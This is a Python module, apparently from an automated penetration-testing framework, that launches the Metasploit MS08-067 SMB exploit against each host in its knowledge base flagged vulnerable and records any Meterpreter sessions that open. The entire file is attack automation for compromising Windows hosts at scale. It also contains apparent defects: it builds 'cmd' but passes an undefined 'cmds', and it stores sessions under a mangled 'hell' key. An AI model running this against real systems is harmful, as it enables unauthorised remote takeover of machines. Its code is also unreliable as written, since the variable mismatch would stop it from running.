import re

from core.msfActionModule import msfActionModule
from core.keystore import KeyStore as kb
from core.utils import Utils


class exploit_msf_ms08_067(msfActionModule):
    def __init__(self, config, display, lock):
        super(exploit_msf_ms08_067, self).__init__(config, display, lock)
        self.title = "Attempt to exploit MS08-067"
        self.shortName = "MSFms08-067"
        self.description = "execute [exploit/windows/smb/ms08_067_netapi] on each target"

        self.requirements = ["msfconsole"]
        self.triggers = ["ms08-067"]
        self.types = ["exploit"]
        
        self.safeLevel = 4

    def getTargets(self):
        # we are interested only in the hosts that had nullsessions
        self.targets = kb.get('vuln/host/*/ms08-067')

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)

                    cmd = {
                            'config':[
                                    "use exploit/windows/smb/ms08_067_netapi",
                                    "set TARGET 0",
                                    "set RHOST %s" % t
                                ],
                            'payload':'win'}
                    result, outfile = self.msfExec(t, cmds)
 
                    parts = re.findall(".*Meterpreter session (\d+) opened.*", result)
                    for part in parts:
                        self.fire("msfSession")
                        self.display.verbose("NEW session on : " + t)
                        kb.add("hell" + t + "/msf/" + str(part))

        return
